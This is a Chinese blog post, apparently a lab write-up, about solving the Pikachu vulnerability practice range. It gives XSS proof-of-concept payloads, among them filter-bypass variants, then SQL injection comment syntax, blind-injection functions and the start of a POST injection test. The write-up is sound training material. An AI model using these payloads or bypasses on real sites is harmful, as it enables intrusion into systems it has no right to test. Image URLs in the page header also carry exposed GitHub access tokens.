<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 6.0.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.1.1/css/all.min.css" integrity="sha256-DfWjNxDkM94fVBWx1H5BMMp0Zq7luBlV8QRcSES7s+0=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" integrity="sha256-Vzbj7sDDS/woiFS3uNKo8eIuni59rjyNGtXfstRzStA=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Pisces","darkmode":false,"version":"8.11.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":true,"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.json","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="xssCross-Site Scripting 简称为“CSS”，为避免与前端叠成样式表的缩写&quot;CSS&quot;冲突，故又称XSS。一般XSS可以分为如下几种常见类型：     1.反射性XSS;     2.存储型XSS;     3.DOM型XSS;     XSS漏洞一直被评估为web漏洞中危害较大的漏洞，在OWASP TOP10的排名中一直属于前三的江湖地位。     XSS是">
<meta property="og:type" content="article">
<meta property="og:title" content="pikachu漏洞靶场通关">
<meta property="og:url" content="http://example.com/2022/04/28/pikachu%E6%BC%8F%E6%B4%9E%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/index.html">
<meta property="og:site_name" content="Chenci&#39;s blog">
<meta property="og:description" content="xssCross-Site Scripting 简称为“CSS”，为避免与前端叠成样式表的缩写&quot;CSS&quot;冲突，故又称XSS。一般XSS可以分为如下几种常见类型：     1.反射性XSS;     2.存储型XSS;     3.DOM型XSS;     XSS漏洞一直被评估为web漏洞中危害较大的漏洞，在OWASP TOP10的排名中一直属于前三的江湖地位。     XSS是">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://raw.githubusercontent.com/chencicici/images/main/202205221450440.png">
<meta property="og:image" content="https://raw.githubusercontent.com/chencicici/images/main/202205221506374.png">
<meta property="og:image" content="https://raw.githubusercontent.com/chencicici/images/main/202205221510986.png">
<meta property="og:image" content="https://raw.githubusercontent.com/chencicici/images/main/202205221516245.png">
<meta property="og:image" content="https://raw.githubusercontent.com/chencicici/images/main/202205221522590.png">
<meta property="og:image" content="https://raw.githubusercontent.com/chencicici/images/main/202205221525149.png">
<meta property="og:image" content="https://raw.githubusercontent.com/chencicici/images/main/202205221532373.png">
<meta property="og:image" content="https://raw.githubusercontent.com/chencicici/images/main/202205221536427.png">
<meta property="og:image" content="https://raw.githubusercontent.com/chencicici/images/main/202205221536452.png">
<meta property="og:image" content="https://raw.githubusercontent.com/chencicici/images/main/202205221547770.png">
<meta property="og:image" content="https://raw.githubusercontent.com/chencicici/images/main/202205221550582.png">
<meta property="og:image" content="https://raw.githubusercontent.com/chencicici/images/main/202205221556988.png">
<meta property="og:image" content="https://raw.githubusercontent.com/chencicici/images/main/202205221602105.png">
<meta property="og:image" content="https://raw.githubusercontent.com/chencicici/images/main/202205221604616.png">
<meta property="og:image" content="https://raw.githubusercontent.com/chencicici/images/main/202205151333668.png?token=ARYCSAS5X3DNSIBK2JN7L5DCQCIOO">
<meta property="og:image" content="https://raw.githubusercontent.com/chencicici/images/main/202205151335056.png?token=ARYCSAUNWHHQI3WY2EMVR6TCQCIUC">
<meta property="og:image" content="https://raw.githubusercontent.com/chencicici/images/main/202205151335214.png?token=ARYCSAXY7XPWYZ52NLBN633CQCIWC">
<meta property="og:image" content="https://raw.githubusercontent.com/chencicici/images/main/202205151336796.png?token=ARYCSASKTPN6D7C276OH2MTCQCIZY">
<meta property="og:image" content="https://raw.githubusercontent.com/chencicici/images/main/202205151336584.png?token=ARYCSARJ2QB3VIHRUF7BBGLCQCI3C">
<meta property="og:image" content="https://raw.githubusercontent.com/chencicici/images/main/202205151337610.png?token=ARYCSAXFRTG7KB3R6NRVTQDCQCI4S">
<meta property="og:image" content="https://raw.githubusercontent.com/chencicici/images/main/202205151339050.png?token=ARYCSAQFEL42LGPO2MJ7EX3CQCJDS">
<meta property="og:image" content="https://raw.githubusercontent.com/chencicici/images/main/202205151338332.png?token=ARYCSAT4PLVT4OXNI4EO4VTCQCJBA">
<meta property="og:image" content="https://raw.githubusercontent.com/chencicici/images/main/202205151515028.png">
<meta property="og:image" content="https://raw.githubusercontent.com/chencicici/images/main/202205151516450.png">
<meta property="og:image" content="https://raw.githubusercontent.com/chencicici/images/main/202205151529002.png">
<meta property="og:image" content="https://raw.githubusercontent.com/chencicici/images/main/202205151534906.png">
<meta property="article:published_time" content="2022-04-28T14:17:59.000Z">
<meta property="article:modified_time" content="2022-05-22T08:04:35.947Z">
<meta property="article:author" content="chenci">
<meta property="article:tag" content="sql注入">
<meta property="article:tag" content="靶场">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/chencicici/images/main/202205221450440.png">


<link rel="canonical" href="http://example.com/2022/04/28/pikachu%E6%BC%8F%E6%B4%9E%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2022/04/28/pikachu%E6%BC%8F%E6%B4%9E%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/","path":"2022/04/28/pikachu漏洞靶场通关/","title":"pikachu漏洞靶场通关"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>pikachu漏洞靶场通关 | Chenci's blog</title>
  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<link rel="alternate" href="/atom.xml" title="Chenci's blog" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Chenci's blog</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li><li class="menu-item menu-item-schedule"><a href="/schedule/" rel="section"><i class="fa fa-calendar fa-fw"></i>日程表</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#xss"><span class="nav-number">1.</span> <span class="nav-text">xss</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%8D%E5%B0%84%E5%9E%8BXSS-GET"><span class="nav-number">1.1.</span> <span class="nav-text">反射型XSS(GET)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%8D%E5%B0%84%E5%9E%8BXSS-POST"><span class="nav-number">1.2.</span> <span class="nav-text">反射型XSS(POST)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AD%98%E5%82%A8%E6%80%A7XSS"><span class="nav-number">1.3.</span> <span class="nav-text">存储性XSS</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DOM-XSS"><span class="nav-number">1.4.</span> <span class="nav-text">DOM-XSS</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DOM-XSS-X"><span class="nav-number">1.5.</span> <span class="nav-text">DOM-XSS-X</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS%E7%9B%B2%E6%89%93"><span class="nav-number">1.6.</span> <span class="nav-text">XSS盲打</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS%E4%B9%8B%E8%BF%87%E6%BB%A4"><span class="nav-number">1.7.</span> <span class="nav-text">XSS之过滤</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS%E4%B9%8Bhtmlspecialchars"><span class="nav-number">1.8.</span> <span class="nav-text">XSS之htmlspecialchars</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS%E4%B9%8Bhref"><span class="nav-number">1.9.</span> <span class="nav-text">XSS之href</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS%E4%B9%8Bjs%E8%BE%93%E5%87%BA"><span class="nav-number">1.10.</span> <span class="nav-text">XSS之js输出</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#sql%E6%B3%A8%E5%85%A5"><span class="nav-number">2.</span> <span class="nav-text">sql注入</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%86%E9%9A%94%E7%AC%A6%E5%92%8C%E6%B3%A8%E9%87%8A%E7%AC%A6"><span class="nav-number">2.1.</span> <span class="nav-text">分隔符和注释符</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%B3%A8%E5%85%A5%E5%B8%B8%E7%94%A8%E5%87%BD%E6%95%B0"><span class="nav-number">2.2.</span> <span class="nav-text">注入常用函数</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%95%B0%E5%AD%97%E5%9E%8B%E6%B3%A8%E5%85%A5-POST"><span class="nav-number">2.3.</span> <span class="nav-text">数字型注入(POST)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AD%97%E7%AC%A6%E5%9E%8B-get"><span class="nav-number">2.4.</span> <span class="nav-text">字符型(get)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%90%9C%E7%B4%A2%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="nav-number">2.5.</span> <span class="nav-text">搜索型注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#xx%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="nav-number">2.6.</span> <span class="nav-text">xx型注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#insert-amp-update%E6%B3%A8%E5%85%A5"><span class="nav-number">2.7.</span> <span class="nav-text">insert&amp;update注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#insert"><span class="nav-number">2.7.1.</span> <span class="nav-text">insert</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#update"><span class="nav-number">2.7.2.</span> <span class="nav-text">update</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#delete%E6%B3%A8%E5%85%A5"><span class="nav-number">2.8.</span> <span class="nav-text">delete注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#http%E5%A4%B4%E6%B3%A8%E5%85%A5"><span class="nav-number">2.9.</span> <span class="nav-text">http头注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%9F%BA%E4%BA%8Eboolian%E7%9A%84%E7%9B%B2%E6%B3%A8"><span class="nav-number">2.10.</span> <span class="nav-text">基于boolian的盲注</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%9F%BA%E4%BA%8E%E6%97%B6%E9%97%B4%E7%9A%84%E7%9B%B2%E6%B3%A8"><span class="nav-number">2.11.</span> <span class="nav-text">基于时间的盲注</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5"><span class="nav-number">2.12.</span> <span class="nav-text">宽字节注入</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#unsafe-upfileupload"><span class="nav-number">3.</span> <span class="nav-text">unsafe upfileupload</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AE%A2%E6%88%B7%E7%AB%AFcheck"><span class="nav-number">3.1.</span> <span class="nav-text">客户端check</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9C%8D%E5%8A%A1%E7%AB%AFcheck"><span class="nav-number">3.2.</span> <span class="nav-text">服务端check</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#getimagesize"><span class="nav-number">3.3.</span> <span class="nav-text">getimagesize()</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="chenci"
      src="/images/IMG_0010.JPG">
  <!--
  <p class="site-author-name" itemprop="name">chenci</p>
  -->
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">16</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">25</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="https://github.com/chencicici" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;chencicici" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:1343369483@qq.com" title="E-Mail → mailto:1343369483@qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>


  <div class="links-of-blogroll site-overview-item animated">
    <div class="links-of-blogroll-title"><i class="fa fa-globe fa-fw"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://www.uodrad.top/" title="https:&#x2F;&#x2F;www.uodrad.top&#x2F;" rel="noopener" target="_blank">uodrad</a>
        </li>
    </ul>
  </div>


       <!--网易云插件-->
      <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=1933503036&auto=0&height=66">
      </iframe>

        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

  <a href="https://github.com/chencicici" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/04/28/pikachu%E6%BC%8F%E6%B4%9E%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/IMG_0010.JPG">
      <meta itemprop="name" content="chenci">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Chenci's blog">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="pikachu漏洞靶场通关 | Chenci's blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          pikachu漏洞靶场通关
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2022-04-28 22:17:59" itemprop="dateCreated datePublished" datetime="2022-04-28T22:17:59+08:00">2022-04-28</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2022-05-22 16:04:35" itemprop="dateModified" datetime="2022-05-22T16:04:35+08:00">2022-05-22</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E9%9D%B6%E5%9C%BA/" itemprop="url" rel="index"><span itemprop="name">靶场</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h1 id="xss"><a href="#xss" class="headerlink" title="xss"></a>xss</h1><pre><code>Cross-Site Scripting 简称为“CSS”，为避免与前端叠成样式表的缩写&quot;CSS&quot;冲突，故又称XSS。一般XSS可以分为如下几种常见类型：
    1.反射性XSS;
    2.存储型XSS;
    3.DOM型XSS;
    XSS漏洞一直被评估为web漏洞中危害较大的漏洞，在OWASP TOP10的排名中一直属于前三的江湖地位。
    XSS是一种发生在前端浏览器端的漏洞，所以其危害的对象也是前端用户。
    形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理，导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。
    因此在XSS漏洞的防范上，一般会采用“对输入进行过滤”和“输出进行转义”的方式进行处理:
      输入过滤：对输入进行过滤，不允许可能导致XSS攻击的字符输入;
      输出转义：根据输出点的位置对输出到前端的内容进行适当转义;
</code></pre>
<h2 id="反射型XSS-GET"><a href="#反射型XSS-GET" class="headerlink" title="反射型XSS(GET)"></a>反射型XSS(GET)</h2><p>对输入长度有限制,直接在url里插入js代码</p>
<ul>
<li>payload  <figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;<span class="title function_">alert</span>(<span class="number">1</span>)&lt;/script&gt;</span><br></pre></td></tr></table></figure>
  <img src="https://raw.githubusercontent.com/chencicici/images/main/202205221450440.png"></li>
</ul>
<h2 id="反射型XSS-POST"><a href="#反射型XSS-POST" class="headerlink" title="反射型XSS(POST)"></a>反射型XSS(POST)</h2><p>抓包插入js</p>
<ul>
<li>payload  <figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;<span class="title function_">alert</span>(<span class="number">1</span>)&lt;/script&gt;</span><br></pre></td></tr></table></figure>
  <img src="https://raw.githubusercontent.com/chencicici/images/main/202205221506374.png"></li>
</ul>
<h2 id="存储性XSS"><a href="#存储性XSS" class="headerlink" title="存储性XSS"></a>存储性XSS</h2><p>和上关一样,区别就是这个是长久存在的</p>
<ul>
<li>payload</li>
</ul>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;<span class="title function_">alert</span>(<span class="number">1</span>)&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/chencicici/images/main/202205221510986.png"></p>
<h2 id="DOM-XSS"><a href="#DOM-XSS" class="headerlink" title="DOM-XSS"></a>DOM-XSS</h2><p>需要先将前面的a标签闭合<br><img src="https://raw.githubusercontent.com/chencicici/images/main/202205221516245.png"></p>
<ul>
<li>payload  <figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27; onclike=&#x27;</span><span class="title function_">alert</span>(<span class="number">1</span>)<span class="string">&#x27;</span></span><br></pre></td></tr></table></figure>
  <img src="https://raw.githubusercontent.com/chencicici/images/main/202205221522590.png"></li>
</ul>
<h2 id="DOM-XSS-X"><a href="#DOM-XSS-X" class="headerlink" title="DOM-XSS-X"></a>DOM-XSS-X</h2><p>输入框输入的内容会被拼接为url<br><img src="https://raw.githubusercontent.com/chencicici/images/main/202205221525149.png"></p>
<ul>
<li>payload</li>
</ul>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27;&gt;&lt;img src=&quot;#&quot; onmouseover=&quot;alert(&#x27;</span>xss<span class="string">&#x27;)&quot;&gt;</span></span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/chencicici/images/main/202205221532373.png"></p>
<h2 id="XSS盲打"><a href="#XSS盲打" class="headerlink" title="XSS盲打"></a>XSS盲打</h2><p>无回显,有输入框就插入js<br><img src="https://raw.githubusercontent.com/chencicici/images/main/202205221536427.png"></p>
<p>到后台查看<br><img src="https://raw.githubusercontent.com/chencicici/images/main/202205221536452.png"></p>
<h2 id="XSS之过滤"><a href="#XSS之过滤" class="headerlink" title="XSS之过滤"></a>XSS之过滤</h2><p>大小写绕过</p>
<ul>
<li>payload<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;<span class="title class_">SCRipt</span>&gt;<span class="title function_">alert</span>(<span class="number">1</span>)&lt;/<span class="title class_">SCRIPt</span>&gt;</span><br></pre></td></tr></table></figure></li>
</ul>
<h2 id="XSS之htmlspecialchars"><a href="#XSS之htmlspecialchars" class="headerlink" title="XSS之htmlspecialchars"></a>XSS之htmlspecialchars</h2><p>&lt;&gt;被过滤<br><img src="https://raw.githubusercontent.com/chencicici/images/main/202205221547770.png"></p>
<ul>
<li>payload<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27; onclick=&#x27;</span><span class="title function_">alert</span>(<span class="number">1</span>)<span class="string">&#x27;</span></span><br></pre></td></tr></table></figure>
<img src="https://raw.githubusercontent.com/chencicici/images/main/202205221550582.png"></li>
</ul>
<h2 id="XSS之href"><a href="#XSS之href" class="headerlink" title="XSS之href"></a>XSS之href</h2><p>输入会被拼接到href属性里,单引号无法闭合,使用<code>javascript:</code>来执行js代码<br><img src="https://raw.githubusercontent.com/chencicici/images/main/202205221556988.png"></p>
<ul>
<li>payload<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">javascript</span>:<span class="title function_">alert</span>(<span class="regexp">/xss/</span>)</span><br></pre></td></tr></table></figure></li>
</ul>
<h2 id="XSS之js输出"><a href="#XSS之js输出" class="headerlink" title="XSS之js输出"></a>XSS之js输出</h2><p>插入js后发现没被闭合,将前面的标签闭合掉<br><img src="https://raw.githubusercontent.com/chencicici/images/main/202205221602105.png"></p>
<ul>
<li>payload<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;<span class="regexp">/script&gt;&lt;script&gt;alert(/</span><span class="number">123</span>/)&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<img src="https://raw.githubusercontent.com/chencicici/images/main/202205221604616.png"></li>
</ul>
<h1 id="sql注入"><a href="#sql注入" class="headerlink" title="sql注入"></a>sql注入</h1><pre><code>在owasp发布的top10排行榜里，注入漏洞一直是危害排名第一的漏洞，其中注入漏洞里面首当其冲的就是数据库注入漏洞。
SQL注入漏洞主要形成的原因是在数据交互中，前端的数据传入到后台处理时，没有做严格的判断，导致其传入的“数据”拼接到SQL语句中后，被当作SQL语句的一部分执行。 从而导致数据库受损（被脱裤、被删除、甚至整个服务器权限沦陷）。
</code></pre>
<h2 id="分隔符和注释符"><a href="#分隔符和注释符" class="headerlink" title="分隔符和注释符"></a>分隔符和注释符</h2><ul>
<li>url使用<code>空格</code>或者<code>%20</code></li>
<li>burp使用 <code>+</code></li>
<li>get使用 <code>--+</code> 注释</li>
<li>post使用 <code>#</code> 注释</li>
</ul>
<h2 id="注入常用函数"><a href="#注入常用函数" class="headerlink" title="注入常用函数"></a>注入常用函数</h2><ul>
<li>like ‘ro%’            # 判断ro或ro…是否成立</li>
<li>regexp ‘^xiaodi[a-z]’ # 正则,匹配xiaodi及xiaodi…等</li>
<li>if(条件,5,0)           # 条件成立 返回5 反之 返回0</li>
<li>sleep(5)              # SQL语句延时执行5秒</li>
<li>mid(a,b,c)            # 从位置b开始，截取a字符串的c位</li>
<li>substr(a,b,c)         # 从b位置开始，截取字符串a的c长度,从1开始</li>
<li>left(database(),1)    # 从左侧截取a的前b位</li>
<li>length(database())&#x3D;8  # 判断数据库当前库名的长度</li>
<li>ord&#x3D;ascii ascii(x)&#x3D;97 # 判断x的ascii码是否等于97</li>
<li>limit(a,b)            # 限制行数,从a条记录开始,返回b条记录 limit(1,1)<h2 id="数字型注入-POST"><a href="#数字型注入-POST" class="headerlink" title="数字型注入(POST)"></a>数字型注入(POST)</h2></li>
</ul>
<ol>
<li><p>使用burpsuite抓包,对参数判断注入</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">id</span>=1<span class="string">&#x27; and=1 &amp;submit=%E6%9F%A5%E8%AF%A2</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>报错,尝试注入<br><img src="https://raw.githubusercontent.com/chencicici/images/main/202205151333668.png?token=ARYCSAS5X3DNSIBK2JN7L5DCQCIOO"></p>
